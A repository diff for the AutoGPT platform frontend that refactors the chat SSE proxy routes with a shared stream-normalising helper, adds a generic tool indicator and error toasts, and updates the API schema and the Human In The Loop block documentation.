||||||
useEffect(() => {
|
useEffect(() => {
|
||||||
if (status === "submitted") {
|
if (status === "submitted") {
|
||||||
@@ -128,6 +131,20 @@ export const ChatMessagesContainer = ({
|
|||||||
}
|
}
|
||||||
}, [status]);
|
}, [status]);
|
||||||
|
|
||||||
|
// Show a toast when a new error occurs, debounced to avoid spam
|
||||||
|
useEffect(() => {
|
||||||
|
if (!error) return;
|
||||||
|
const now = Date.now();
|
||||||
|
if (now - lastToastTimeRef.current < 3_000) return;
|
||||||
|
lastToastTimeRef.current = now;
|
||||||
|
toast({
|
||||||
|
variant: "destructive",
|
||||||
|
title: "Something went wrong",
|
||||||
|
description:
|
||||||
|
"The assistant encountered an error. Please try sending your message again.",
|
||||||
|
});
|
||||||
|
}, [error]);
|
||||||
|
|
||||||
const lastMessage = messages[messages.length - 1];
|
const lastMessage = messages[messages.length - 1];
|
||||||
const lastAssistantHasVisibleContent =
|
const lastAssistantHasVisibleContent =
|
||||||
lastMessage?.role === "assistant" &&
|
lastMessage?.role === "assistant" &&
|
||||||
@@ -239,6 +256,16 @@ export const ChatMessagesContainer = ({
|
|||||||
/>
|
/>
|
||||||
);
|
);
|
||||||
default:
|
default:
|
||||||
|
// Render a generic tool indicator for SDK built-in
|
||||||
|
// tools (Read, Glob, Grep, etc.) or any unrecognized tool
|
||||||
|
if (part.type.startsWith("tool-")) {
|
||||||
|
return (
|
||||||
|
<GenericTool
|
||||||
|
key={`${message.id}-${i}`}
|
||||||
|
part={part as ToolUIPart}
|
||||||
|
/>
|
||||||
|
);
|
||||||
|
}
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
})}
|
})}
|
||||||
@@ -263,8 +290,12 @@ export const ChatMessagesContainer = ({
|
|||||||
</Message>
|
</Message>
|
||||||
)}
|
)}
|
||||||
{error && (
|
{error && (
|
||||||
<div className="rounded-lg bg-red-50 p-3 text-red-600">
|
<div className="rounded-lg bg-red-50 p-4 text-sm text-red-700">
|
||||||
Error: {error.message}
|
<p className="font-medium">Something went wrong</p>
|
||||||
|
<p className="mt-1 text-red-600">
|
||||||
|
The assistant encountered an error. Please try sending your
|
||||||
|
message again.
|
||||||
|
</p>
|
||||||
</div>
|
</div>
|
||||||
)}
|
)}
|
||||||
</ConversationContent>
|
</ConversationContent>
|
||||||
|
|||||||
@@ -30,7 +30,7 @@ export function ContentCard({
|
|||||||
return (
|
return (
|
||||||
<div
|
<div
|
||||||
className={cn(
|
className={cn(
|
||||||
"rounded-lg bg-gradient-to-r from-purple-500/30 to-blue-500/30 p-[1px]",
|
"min-w-0 rounded-lg bg-gradient-to-r from-purple-500/30 to-blue-500/30 p-[1px]",
|
||||||
className,
|
className,
|
||||||
)}
|
)}
|
||||||
>
|
>
|
||||||
|
|||||||
@@ -4,7 +4,6 @@ import { WarningDiamondIcon } from "@phosphor-icons/react";
|
|||||||
import type { ToolUIPart } from "ai";
|
import type { ToolUIPart } from "ai";
|
||||||
import { useCopilotChatActions } from "../../components/CopilotChatActionsProvider/useCopilotChatActions";
|
import { useCopilotChatActions } from "../../components/CopilotChatActionsProvider/useCopilotChatActions";
|
||||||
import { MorphingTextAnimation } from "../../components/MorphingTextAnimation/MorphingTextAnimation";
|
import { MorphingTextAnimation } from "../../components/MorphingTextAnimation/MorphingTextAnimation";
|
||||||
import { OrbitLoader } from "../../components/OrbitLoader/OrbitLoader";
|
|
||||||
import { ProgressBar } from "../../components/ProgressBar/ProgressBar";
|
import { ProgressBar } from "../../components/ProgressBar/ProgressBar";
|
||||||
import {
|
import {
|
||||||
ContentCardDescription,
|
ContentCardDescription,
|
||||||
@@ -77,7 +76,7 @@ function getAccordionMeta(output: CreateAgentToolOutput) {
|
|||||||
isOperationInProgressOutput(output)
|
isOperationInProgressOutput(output)
|
||||||
) {
|
) {
|
||||||
return {
|
return {
|
||||||
icon: <OrbitLoader size={32} />,
|
icon,
|
||||||
title: "Creating agent, this may take a few minutes. Sit back and relax.",
|
title: "Creating agent, this may take a few minutes. Sit back and relax.",
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -0,0 +1,63 @@
|
|||||||
|
"use client";
|
||||||
|
|
||||||
|
import { ToolUIPart } from "ai";
|
||||||
|
import { GearIcon } from "@phosphor-icons/react";
|
||||||
|
import { MorphingTextAnimation } from "../../components/MorphingTextAnimation/MorphingTextAnimation";
|
||||||
|
|
||||||
|
interface Props {
|
||||||
|
part: ToolUIPart;
|
||||||
|
}
|
||||||
|
|
||||||
|
function extractToolName(part: ToolUIPart): string {
|
||||||
|
// ToolUIPart.type is "tool-{name}", extract the name portion.
|
||||||
|
return part.type.replace(/^tool-/, "");
|
||||||
|
}
|
||||||
|
|
||||||
|
function formatToolName(name: string): string {
|
||||||
|
// "search_docs" → "Search docs", "Read" → "Read"
|
||||||
|
return name.replace(/_/g, " ").replace(/^\w/, (c) => c.toUpperCase());
|
||||||
|
}
|
||||||
|
|
||||||
|
function getAnimationText(part: ToolUIPart): string {
|
||||||
|
const label = formatToolName(extractToolName(part));
|
||||||
|
|
||||||
|
switch (part.state) {
|
||||||
|
case "input-streaming":
|
||||||
|
case "input-available":
|
||||||
|
return `Running ${label}…`;
|
||||||
|
case "output-available":
|
||||||
|
return `${label} completed`;
|
||||||
|
case "output-error":
|
||||||
|
return `${label} failed`;
|
||||||
|
default:
|
||||||
|
return `Running ${label}…`;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
export function GenericTool({ part }: Props) {
|
||||||
|
const isStreaming =
|
||||||
|
part.state === "input-streaming" || part.state === "input-available";
|
||||||
|
const isError = part.state === "output-error";
|
||||||
|
|
||||||
|
return (
|
||||||
|
<div className="py-2">
|
||||||
|
<div className="flex items-center gap-2 text-sm text-muted-foreground">
|
||||||
|
<GearIcon
|
||||||
|
size={14}
|
||||||
|
weight="regular"
|
||||||
|
className={
|
||||||
|
isError
|
||||||
|
? "text-red-500"
|
||||||
|
: isStreaming
|
||||||
|
? "animate-spin text-neutral-500"
|
||||||
|
: "text-neutral-400"
|
||||||
|
}
|
||||||
|
/>
|
||||||
|
<MorphingTextAnimation
|
||||||
|
text={getAnimationText(part)}
|
||||||
|
className={isError ? "text-red-500" : undefined}
|
||||||
|
/>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
);
|
||||||
|
}
|
||||||
@@ -203,7 +203,7 @@ export function getAccordionMeta(output: RunAgentToolOutput): {
|
|||||||
? output.status.trim()
|
? output.status.trim()
|
||||||
: "started";
|
: "started";
|
||||||
return {
|
return {
|
||||||
icon: <OrbitLoader size={28} className="text-neutral-700" />,
|
icon,
|
||||||
title: output.graph_name,
|
title: output.graph_name,
|
||||||
description: `Status: ${statusText}`,
|
description: `Status: ${statusText}`,
|
||||||
};
|
};
|
||||||
|
|||||||
@@ -149,7 +149,7 @@ export function getAccordionMeta(output: RunBlockToolOutput): {
|
|||||||
if (isRunBlockBlockOutput(output)) {
|
if (isRunBlockBlockOutput(output)) {
|
||||||
const keys = Object.keys(output.outputs ?? {});
|
const keys = Object.keys(output.outputs ?? {});
|
||||||
return {
|
return {
|
||||||
icon: <OrbitLoader size={24} className="text-neutral-700" />,
|
icon,
|
||||||
title: output.block_name,
|
title: output.block_name,
|
||||||
description:
|
description:
|
||||||
keys.length > 0
|
keys.length > 0
|
||||||
|
|||||||
@@ -1,11 +1,8 @@
|
|||||||
import { environment } from "@/services/environment";
|
import { environment } from "@/services/environment";
|
||||||
import { getServerAuthToken } from "@/lib/autogpt-server-api/helpers";
|
import { getServerAuthToken } from "@/lib/autogpt-server-api/helpers";
|
||||||
import { NextRequest } from "next/server";
|
import { NextRequest } from "next/server";
|
||||||
|
import { normalizeSSEStream, SSE_HEADERS } from "../../../sse-helpers";
|
||||||
|
|
||||||
/**
|
|
||||||
* SSE Proxy for chat streaming.
|
|
||||||
* Supports POST with context (page content + URL) in the request body.
|
|
||||||
*/
|
|
||||||
export async function POST(
|
export async function POST(
|
||||||
request: NextRequest,
|
request: NextRequest,
|
||||||
{ params }: { params: Promise<{ sessionId: string }> },
|
{ params }: { params: Promise<{ sessionId: string }> },
|
||||||
@@ -23,17 +20,14 @@ export async function POST(
|
|||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
// Get auth token from server-side session
|
|
||||||
const token = await getServerAuthToken();
|
const token = await getServerAuthToken();
|
||||||
|
|
||||||
// Build backend URL
|
|
||||||
const backendUrl = environment.getAGPTServerBaseUrl();
|
const backendUrl = environment.getAGPTServerBaseUrl();
|
||||||
const streamUrl = new URL(
|
const streamUrl = new URL(
|
||||||
`/api/chat/sessions/${sessionId}/stream`,
|
`/api/chat/sessions/${sessionId}/stream`,
|
||||||
backendUrl,
|
backendUrl,
|
||||||
);
|
);
|
||||||
|
|
||||||
// Forward request to backend with auth header
|
|
||||||
const headers: Record<string, string> = {
|
const headers: Record<string, string> = {
|
||||||
"Content-Type": "application/json",
|
"Content-Type": "application/json",
|
||||||
Accept: "text/event-stream",
|
Accept: "text/event-stream",
|
||||||
@@ -63,14 +57,15 @@ export async function POST(
|
|||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
// Return the SSE stream directly
|
if (!response.body) {
|
||||||
return new Response(response.body, {
|
return new Response(
|
||||||
headers: {
|
JSON.stringify({ error: "Empty response from chat service" }),
|
||||||
"Content-Type": "text/event-stream",
|
{ status: 502, headers: { "Content-Type": "application/json" } },
|
||||||
"Cache-Control": "no-cache, no-transform",
|
);
|
||||||
Connection: "keep-alive",
|
}
|
||||||
"X-Accel-Buffering": "no",
|
|
||||||
},
|
return new Response(normalizeSSEStream(response.body), {
|
||||||
|
headers: SSE_HEADERS,
|
||||||
});
|
});
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
console.error("SSE proxy error:", error);
|
console.error("SSE proxy error:", error);
|
||||||
@@ -87,13 +82,6 @@ export async function POST(
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
|
||||||
* Resume an active stream for a session.
|
|
||||||
*
|
|
||||||
* Called by the AI SDK's `useChat(resume: true)` on page load.
|
|
||||||
* Proxies to the backend which checks for an active stream and either
|
|
||||||
* replays it (200 + SSE) or returns 204 No Content.
|
|
||||||
*/
|
|
||||||
export async function GET(
|
export async function GET(
|
||||||
_request: NextRequest,
|
_request: NextRequest,
|
||||||
{ params }: { params: Promise<{ sessionId: string }> },
|
{ params }: { params: Promise<{ sessionId: string }> },
|
||||||
@@ -124,7 +112,6 @@ export async function GET(
|
|||||||
headers,
|
headers,
|
||||||
});
|
});
|
||||||
|
|
||||||
// 204 = no active stream to resume
|
|
||||||
if (response.status === 204) {
|
if (response.status === 204) {
|
||||||
return new Response(null, { status: 204 });
|
return new Response(null, { status: 204 });
|
||||||
}
|
}
|
||||||
@@ -137,12 +124,13 @@ export async function GET(
|
|||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
return new Response(response.body, {
|
if (!response.body) {
|
||||||
|
return new Response(null, { status: 204 });
|
||||||
|
}
|
||||||
|
|
||||||
|
return new Response(normalizeSSEStream(response.body), {
|
||||||
headers: {
|
headers: {
|
||||||
"Content-Type": "text/event-stream",
|
...SSE_HEADERS,
|
||||||
"Cache-Control": "no-cache, no-transform",
|
|
||||||
Connection: "keep-alive",
|
|
||||||
"X-Accel-Buffering": "no",
|
|
||||||
"x-vercel-ai-ui-message-stream": "v1",
|
"x-vercel-ai-ui-message-stream": "v1",
|
||||||
},
|
},
|
||||||
});
|
});
|
||||||
|
|||||||
72
autogpt_platform/frontend/src/app/api/chat/sse-helpers.ts
Normal file
72
autogpt_platform/frontend/src/app/api/chat/sse-helpers.ts
Normal file
@@ -0,0 +1,72 @@
|
|||||||
|
export const SSE_HEADERS = {
|
||||||
|
"Content-Type": "text/event-stream",
|
||||||
|
"Cache-Control": "no-cache, no-transform",
|
||||||
|
Connection: "keep-alive",
|
||||||
|
"X-Accel-Buffering": "no",
|
||||||
|
} as const;
|
||||||
|
|
||||||
|
export function normalizeSSEStream(
|
||||||
|
input: ReadableStream<Uint8Array>,
|
||||||
|
): ReadableStream<Uint8Array> {
|
||||||
|
const decoder = new TextDecoder();
|
||||||
|
const encoder = new TextEncoder();
|
||||||
|
let buffer = "";
|
||||||
|
|
||||||
|
return input.pipeThrough(
|
||||||
|
new TransformStream<Uint8Array, Uint8Array>({
|
||||||
|
transform(chunk, controller) {
|
||||||
|
buffer += decoder.decode(chunk, { stream: true });
|
||||||
|
|
||||||
|
const parts = buffer.split("\n\n");
|
||||||
|
buffer = parts.pop() ?? "";
|
||||||
|
|
||||||
|
for (const part of parts) {
|
||||||
|
const normalized = normalizeSSEEvent(part);
|
||||||
|
controller.enqueue(encoder.encode(normalized + "\n\n"));
|
||||||
|
}
|
||||||
|
},
|
||||||
|
flush(controller) {
|
||||||
|
if (buffer.trim()) {
|
||||||
|
const normalized = normalizeSSEEvent(buffer);
|
||||||
|
controller.enqueue(encoder.encode(normalized + "\n\n"));
|
||||||
|
}
|
||||||
|
},
|
||||||
|
}),
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
function normalizeSSEEvent(event: string): string {
|
||||||
|
const lines = event.split("\n");
|
||||||
|
const dataLines: string[] = [];
|
||||||
|
const otherLines: string[] = [];
|
||||||
|
|
||||||
|
for (const line of lines) {
|
||||||
|
if (line.startsWith("data: ")) {
|
||||||
|
dataLines.push(line.slice(6));
|
||||||
|
} else {
|
||||||
|
otherLines.push(line);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (dataLines.length === 0) return event;
|
||||||
|
|
||||||
|
const dataStr = dataLines.join("\n");
|
||||||
|
try {
|
||||||
|
const parsed = JSON.parse(dataStr) as Record<string, unknown>;
|
||||||
|
if (parsed.type === "error") {
|
||||||
|
const normalized = {
|
||||||
|
type: "error",
|
||||||
|
errorText:
|
||||||
|
typeof parsed.errorText === "string"
|
||||||
|
? parsed.errorText
|
||||||
|
: "An unexpected error occurred",
|
||||||
|
};
|
||||||
|
const newData = `data: ${JSON.stringify(normalized)}`;
|
||||||
|
return [...otherLines.filter((l) => l.length > 0), newData].join("\n");
|
||||||
|
}
|
||||||
|
} catch {
|
||||||
|
// Not valid JSON — pass through as-is
|
||||||
|
}
|
||||||
|
|
||||||
|
return event;
|
||||||
|
}
|
||||||
@@ -1,20 +1,8 @@
|
|||||||
import { environment } from "@/services/environment";
|
import { environment } from "@/services/environment";
|
||||||
import { getServerAuthToken } from "@/lib/autogpt-server-api/helpers";
|
import { getServerAuthToken } from "@/lib/autogpt-server-api/helpers";
|
||||||
import { NextRequest } from "next/server";
|
import { NextRequest } from "next/server";
|
||||||
|
import { normalizeSSEStream, SSE_HEADERS } from "../../../sse-helpers";
|
||||||
|
|
||||||
/**
|
|
||||||
* SSE Proxy for task stream reconnection.
|
|
||||||
*
|
|
||||||
* This endpoint allows clients to reconnect to an ongoing or recently completed
|
|
||||||
* background task's stream. It replays missed messages from Redis Streams and
|
|
||||||
* subscribes to live updates if the task is still running.
|
|
||||||
*
|
|
||||||
* Client contract:
|
|
||||||
* 1. When receiving an operation_started event, store the task_id
|
|
||||||
* 2. To reconnect: GET /api/chat/tasks/{taskId}/stream?last_message_id={idx}
|
|
||||||
* 3. Messages are replayed from the last_message_id position
|
|
||||||
* 4. Stream ends when "finish" event is received
|
|
||||||
*/
|
|
||||||
export async function GET(
|
export async function GET(
|
||||||
request: NextRequest,
|
request: NextRequest,
|
||||||
{ params }: { params: Promise<{ taskId: string }> },
|
{ params }: { params: Promise<{ taskId: string }> },
|
||||||
@@ -24,15 +12,12 @@ export async function GET(
|
|||||||
const lastMessageId = searchParams.get("last_message_id") || "0-0";
|
const lastMessageId = searchParams.get("last_message_id") || "0-0";
|
||||||
|
|
||||||
try {
|
try {
|
||||||
// Get auth token from server-side session
|
|
||||||
const token = await getServerAuthToken();
|
const token = await getServerAuthToken();
|
||||||
|
|
||||||
// Build backend URL
|
|
||||||
const backendUrl = environment.getAGPTServerBaseUrl();
|
const backendUrl = environment.getAGPTServerBaseUrl();
|
||||||
const streamUrl = new URL(`/api/chat/tasks/${taskId}/stream`, backendUrl);
|
const streamUrl = new URL(`/api/chat/tasks/${taskId}/stream`, backendUrl);
|
||||||
streamUrl.searchParams.set("last_message_id", lastMessageId);
|
streamUrl.searchParams.set("last_message_id", lastMessageId);
|
||||||
|
|
||||||
// Forward request to backend with auth header
|
|
||||||
const headers: Record<string, string> = {
|
const headers: Record<string, string> = {
|
||||||
Accept: "text/event-stream",
|
Accept: "text/event-stream",
|
||||||
"Cache-Control": "no-cache",
|
"Cache-Control": "no-cache",
|
||||||
@@ -56,14 +41,12 @@ export async function GET(
|
|||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
// Return the SSE stream directly
|
if (!response.body) {
|
||||||
return new Response(response.body, {
|
return new Response(null, { status: 204 });
|
||||||
headers: {
|
}
|
||||||
"Content-Type": "text/event-stream",
|
|
||||||
"Cache-Control": "no-cache, no-transform",
|
return new Response(normalizeSSEStream(response.body), {
|
||||||
Connection: "keep-alive",
|
headers: SSE_HEADERS,
|
||||||
"X-Accel-Buffering": "no",
|
|
||||||
},
|
|
||||||
});
|
});
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
console.error("Task stream proxy error:", error);
|
console.error("Task stream proxy error:", error);
|
||||||
|
|||||||
@@ -7022,29 +7022,24 @@
|
|||||||
"input_schema": {
|
"input_schema": {
|
||||||
"additionalProperties": true,
|
"additionalProperties": true,
|
||||||
"type": "object",
|
"type": "object",
|
||||||
"title": "Input Schema"
|
"title": "Input Schema",
|
||||||
|
"description": "Full JSON schema for block inputs"
|
||||||
},
|
},
|
||||||
"output_schema": {
|
"output_schema": {
|
||||||
"additionalProperties": true,
|
"additionalProperties": true,
|
||||||
"type": "object",
|
"type": "object",
|
||||||
"title": "Output Schema"
|
"title": "Output Schema",
|
||||||
|
"description": "Full JSON schema for block outputs"
|
||||||
},
|
},
|
||||||
"required_inputs": {
|
"required_inputs": {
|
||||||
"items": { "$ref": "#/components/schemas/BlockInputFieldInfo" },
|
"items": { "$ref": "#/components/schemas/BlockInputFieldInfo" },
|
||||||
"type": "array",
|
"type": "array",
|
||||||
"title": "Required Inputs",
|
"title": "Required Inputs",
|
||||||
"description": "List of required input fields for this block"
|
"description": "List of input fields for this block"
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
"type": "object",
|
"type": "object",
|
||||||
"required": [
|
"required": ["id", "name", "description", "categories"],
|
||||||
"id",
|
|
||||||
"name",
|
|
||||||
"description",
|
|
||||||
"categories",
|
|
||||||
"input_schema",
|
|
||||||
"output_schema"
|
|
||||||
],
|
|
||||||
"title": "BlockInfoSummary",
|
"title": "BlockInfoSummary",
|
||||||
"description": "Summary of a block for search results."
|
"description": "Summary of a block for search results."
|
||||||
},
|
},
|
||||||
@@ -7090,7 +7085,7 @@
|
|||||||
"usage_hint": {
|
"usage_hint": {
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"title": "Usage Hint",
|
"title": "Usage Hint",
|
||||||
"default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the required fields from input_schema."
|
"default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the fields listed in required_inputs."
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
"type": "object",
|
"type": "object",
|
||||||
|
|||||||
@@ -61,7 +61,7 @@ Below is a comprehensive list of all available blocks, categorized by their prim
|
|||||||
| [Get List Item](block-integrations/basic.md#get-list-item) | Returns the element at the given index |
|
| [Get List Item](block-integrations/basic.md#get-list-item) | Returns the element at the given index |
|
||||||
| [Get Store Agent Details](block-integrations/system/store_operations.md#get-store-agent-details) | Get detailed information about an agent from the store |
|
| [Get Store Agent Details](block-integrations/system/store_operations.md#get-store-agent-details) | Get detailed information about an agent from the store |
|
||||||
| [Get Weather Information](block-integrations/basic.md#get-weather-information) | Retrieves weather information for a specified location using OpenWeatherMap API |
|
| [Get Weather Information](block-integrations/basic.md#get-weather-information) | Retrieves weather information for a specified location using OpenWeatherMap API |
|
||||||
| [Human In The Loop](block-integrations/basic.md#human-in-the-loop) | Pause execution and wait for human approval or modification of data |
|
| [Human In The Loop](block-integrations/basic.md#human-in-the-loop) | Pause execution for human review |
|
||||||
| [List Is Empty](block-integrations/basic.md#list-is-empty) | Checks if a list is empty |
|
| [List Is Empty](block-integrations/basic.md#list-is-empty) | Checks if a list is empty |
|
||||||
| [List Library Agents](block-integrations/system/library_operations.md#list-library-agents) | List all agents in your personal library |
|
| [List Library Agents](block-integrations/system/library_operations.md#list-library-agents) | List all agents in your personal library |
|
||||||
| [Note](block-integrations/basic.md#note) | A visual annotation block that displays a sticky note in the workflow editor for documentation and organization purposes |
|
| [Note](block-integrations/basic.md#note) | A visual annotation block that displays a sticky note in the workflow editor for documentation and organization purposes |
|
||||||
|
|||||||
@@ -975,7 +975,7 @@ A travel planning application could use this block to provide users with current
|
|||||||
## Human In The Loop
|
## Human In The Loop
|
||||||
|
|
||||||
### What it is
|
### What it is
|
||||||
Pause execution and wait for human approval or modification of data
|
Pause execution for human review. Data flows through approved_data or rejected_data output based on the reviewer's decision. Outputs contain the actual data, not status strings.
|
||||||
|
|
||||||
### How it works
|
### How it works
|
||||||
<!-- MANUAL: how_it_works -->
|
<!-- MANUAL: how_it_works -->
|
||||||
@@ -988,18 +988,18 @@ This enables human oversight at critical points in automated workflows, ensuring
|
|||||||
|
|
||||||
| Input | Description | Type | Required |
|
| Input | Description | Type | Required |
|
||||||
|-------|-------------|------|----------|
|
|-------|-------------|------|----------|
|
||||||
| data | The data to be reviewed by a human user | Data | Yes |
|
| data | The data to be reviewed by a human user. This exact data will be passed through to either approved_data or rejected_data output based on the reviewer's decision. | Data | Yes |
|
||||||
| name | A descriptive name for what this data represents | str | Yes |
|
| name | A descriptive name for what this data represents. This helps the reviewer understand what they are reviewing. | str | Yes |
|
||||||
| editable | Whether the human reviewer can edit the data | bool | No |
|
| editable | Whether the human reviewer can edit the data before approving or rejecting it | bool | No |
|
||||||
|
|
||||||
### Outputs
|
### Outputs
|
||||||
|
|
||||||
| Output | Description | Type |
|
| Output | Description | Type |
|
||||||
|--------|-------------|------|
|
|--------|-------------|------|
|
||||||
| error | Error message if the operation failed | str |
|
| error | Error message if the operation failed | str |
|
||||||
| approved_data | The data when approved (may be modified by reviewer) | Approved Data |
|
| approved_data | Outputs the input data when the reviewer APPROVES it. The value is the actual data itself (not a status string like 'APPROVED'). If the reviewer edited the data, this contains the modified version. Connect downstream blocks here for the 'approved' workflow path. | Approved Data |
|
||||||
| rejected_data | The data when rejected (may be modified by reviewer) | Rejected Data |
|
| rejected_data | Outputs the input data when the reviewer REJECTS it. The value is the actual data itself (not a status string like 'REJECTED'). If the reviewer edited the data, this contains the modified version. Connect downstream blocks here for the 'rejected' workflow path. | Rejected Data |
|
||||||
| review_message | Any message provided by the reviewer | str |
|
| review_message | Optional message provided by the reviewer explaining their decision. Only outputs when the reviewer provides a message; this pin does not fire if no message was given. | str |
|
||||||
|
|
||||||
### Possible use case
|
### Possible use case
|
||||||
<!-- MANUAL: use_case -->
|
<!-- MANUAL: use_case -->
|
||||||
|
|||||||
Reference in New Issue
Block a user